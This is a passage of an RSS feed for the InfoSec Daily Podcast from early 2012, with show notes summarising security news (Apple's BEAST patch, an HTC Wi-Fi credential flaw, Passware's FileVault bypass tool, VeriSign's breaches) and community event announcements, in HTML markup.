<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. Apache disabled the &#39;empty fragment&#39; countermeasure which prevented these attacks. This issue is addressed by providing a configuration parameter to control the countermeasure and enabling it by default,&quot; Apple said in its advisory.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple also pushed out an update that revokes trust in some of the certificates issued by Malaysian CA DigiCert that were found last year to contain weak cryptographic keys.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://www.pcadvisor.co.uk/news/mobile-phone/3334795/htc-vows-fix-android-flaw-revealing-wi-fi-credentials/?olo=rss"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/mobile-phone/3334795/htc-vows-fix-android-flaw-revealing-wi-fi-credentials/?olo=rss</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HTC is moving quickly to squash a security flaw that could expose Wi-Fi credentials on the company&#39;s Android phones.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Using an app that takes advantage of this flaw, an attacker could harvest SSID names and passwords for all wireless networks that the phone has accessed. For average consumers, this isn&#39;t a huge concern, but as researchers Chris Hessing and Bret Jordan note, the exploit &ldquo;exposes enterprise-privileged credentials in a manner that allows targeted exploitation.&rdquo;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The affected phones are the Desire HD (both &quot;ace&quot; and &quot;spade&quot; board revisions) Versions FRG83D and GRI40; Glacier Version FRG83; Droid Incredible Version FRF91; Thunderbolt 4G Version FRG83D; Sensation Z710e Version GRI40; Sensation 4G &#8211; Version GRI40; Desire S &#8211; Version GRI40; EVO 3D Version GRI40; and EVO 4G Version GRI40. HTC&#39;s MyTouch 3G and Google Nexus One are not affected.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HTC has acknowledged the issue, and says most phones have already received a fix through regular updates. Other phones, however, will require users to manually load the fix. The company says it will have more information on the matter next week.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://news.softpedia.com/news/Hackers-from-US-and-China-Responsible-for-40-of-Hack-Attempts-250311.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Hackers-from-US-and-China-Responsible-for-40-of-Hack-Attempts-250311.shtml</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A study released by security firm NCC reveals the origins of most hacking operations and the estimated damages they cause to the global economy each year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The numbers show that hackers from the UK cost the global economy over $2 billion (1.4 billion EUR) in the year that passed, counting a total of 23 million hack attempts.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While this puts the United Kingdom on the 15th place on a global chart, the first two positions are occupied by China and the United States, the operations launched by cybercriminals from these countries costing the global economy around $44 billion (31 billion EUR).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Reading the papers each day, it&rsquo;s easy to think of hacking as something that happens to us from afar; that we&rsquo;re victims of foreign criminal gangs in developing countries. Yet hackers can be anywhere in the world, as our research illustrates, including on our own doorstep,&rdquo; Rob Cotton, NCC Group&rsquo;s chief executive said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">US and China are followed on the global list by Russia, Brazil, Italy, Netherlands, France, Denmark, Germany and India.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s somewhat surprising that so many highly developed European countries have such a great contribution to the hacking attempts recorded worldwide, counting around 200 million attempted hacks with consequences translating into costs of $16 billion (11 billion EUR) each year. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-from-tracking-you/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></a><a href="http://nakedsecurity.sophos.com/2012/02/02/filevault-encryption-broken/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/02/02/filevault-encryption-broken/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">California-based forensics software vendor Passware has released the latest version of its toolkit, which the company claims can bypass Apple&#39;s FileVault 2 disk encryption &quot;in minutes,&quot; as well as volumes encrypted with TrueCrypt.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The software is reportedly able to capture the contents of a computer&#39;s memory via FireWire (also known as IEEE 1394 or i.LINK), analyze the memory dump, and extract the encryption keys. Passware claims that the software can recover passwords from decrypted Mac OS X keychain files as well.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Previous and current versions of Passware&#39;s software are also able to bypass Microsoft&#39;s BitLocker encryption which is built into some editions of Windows.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although Passware seems to mainly market its software to government and law enforcement agencies and military organizations, anyone with US $795 can purchase an edition of Passware Kit that includes these features. Interestingly, Passware also lists Apple, Microsoft, Intel, and several other major tech companies among its customers.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For those who might find all this concerning, it is important to note a few important caveats.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">First, Passware&#39;s software requires physical access to a computer with a working FireWire port; a remote internet attacker cannot use it to break into your Mac or PC.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.pcmag.com/article2/0,2817,2399773,00.asp"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2399773,00.asp</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VeriSign was hit by hackers in 2010 and its computers and servers were accessed several times, but the breach was not properly reported until late last year.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The information was revealed in an October</span><a href="http://www.sec.gov/Archives/edgar/data/1014473/000119312511285850/d219781d10q.htm"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">filing</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with the Securities and Exchange Commission (SEC) and</span><a href="http://www.reuters.com/article/2012/02/02/us-hacking-verisign-idUSTRE8110Z820120202"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">reported today</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> by Reuters.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In 2010, the Company faced several successful attacks against its corporate network in which access was gained to information on a small portion of our computers and servers,&quot; VeriSign said. &quot;We have investigated and do not believe these attacks breached the servers that support our Domain Name System (&#39;DNS&#39;) network.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information was stolen, though VeriSign did not provide details on what went missing.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But while the hacks occurred in 2010, VeriSign&#39;s information security group did not tell management about the attacks until September 2011. VeriSign said it has since changed its reporting policies to make sure the same thing doesn&#39;t happen again.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information was stolen, though VeriSign did not provide details on what went missing.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But while the hacks occurred in 2010, VeriSign&#39;s information security group did not tell management about the attacks until September 2011. VeriSign said it has since changed its reporting policies to make sure the same thing doesn&#39;t happen again.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The group implemented remedial measures designed to mitigate the attacks and to detect and thwart similar additional attacks. However, given the nature of such attacks, we cannot assure that our remedial actions will be sufficient to thwart future attacks or prevent the future loss of information,&quot; VeriSign said in its filing. &quot;In addition, although the Company is unaware of any situation in which possibly exfiltrated information has been used, we are unable to assure that such information was not or could not be used in the future.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VeriSign did not immediately respond to a request for additional comment.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://boingboing.net/2012/02/02/french-court-rules-that-its.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://boingboing.net/2012/02/02/french-court-rules-that-its.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A French court has ruled that Google&#39;s free Google Maps application API is anti-competitive and has ordered the company to pay &euro;500,000 to Bottin Cartographes, a for-pay map company, as well as a &euro;15,000 fine. Bottin Cartographes argued that Google was only planning to give away the service for free until all the competitors had been driven out of business and then they would start charging. This seems implausible to me, and contrary to Google&#39;s business model (give away services, make money from mining the use of those services). Google says it will appeal.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This is the end of a two-year battle, a decision without precedent,&quot; said the lawyer for Bottin Cartographes, Jean-David Scemmama.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We proved the illegality of (Google&#39;s) strategy to remove its competitors&#8230; the court recognised the unfair and abusive character of the methods used and allocated Bottin Cartographes all it claimed. This is the first time Google has been convicted for its Google Maps application,&quot; he said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I wonder what Bottin Cartographes will do when OpenStreetMaps finishes producing high-quality, free, public domain maps of France that can be used to create APIs of the same scope and utility?</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-584-episode-584-os-x-10-7-3-htc-wifi-oops-leading-hackers-passware-verisign/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3452/0/infosec-daily-podcast-episode-584.mp3" length="18427071" type="audio/mpeg" />
		<itunes:duration>0:38:20</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 584 for February 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 584 for February 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://threatpost.com/en_us/blogs/apple-ships-huge-set-patches-os-x-020212
Apple has released a massive set of patches for a wide range of security vulnerabilities in a number of its products and components, including OSX Lion and QuickTime. The patches, which are rolled up in OS X 10.7.3, fix a slew of serious bugs, many of which can be used to execute remote code on vulnerable machines.
One of the more serious vulnerabilities Apple fixed is the flaw that researchers Juliano Rizzo and Thai Duong discovered in the TLS 1.0 and SSL 3.0 protocols last year. The vulnerability, for which they wrote a proof-of-concept exploit tool called BEAST, is fixed in the new version of Apache that Apple included in yesterday&#39;s patches. Exploiting the flaw enables an attacker to decrypt some SSL sessions.
&#34;There[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 583 &#8211; Pentest Lessons, DNT for Google, 7-Step Program, Captcha Cracking Malware &amp; Mobile Device Privacy Act</title>
		<link>http://www.isdpodcast.com/episode-583-pentest-lessons-dnt-for-google-7-step-program-captcha-cracking-malware-mobile-device-privacy-act</link>
		<comments>http://www.isdpodcast.com/episode-583-pentest-lessons-dnt-for-google-7-step-program-captcha-cracking-malware-mobile-device-privacy-act#comments</comments>
		<pubDate>Thu, 02 Feb 2012 01:48:33 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3447</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 583 for February 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 583 for February 1, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
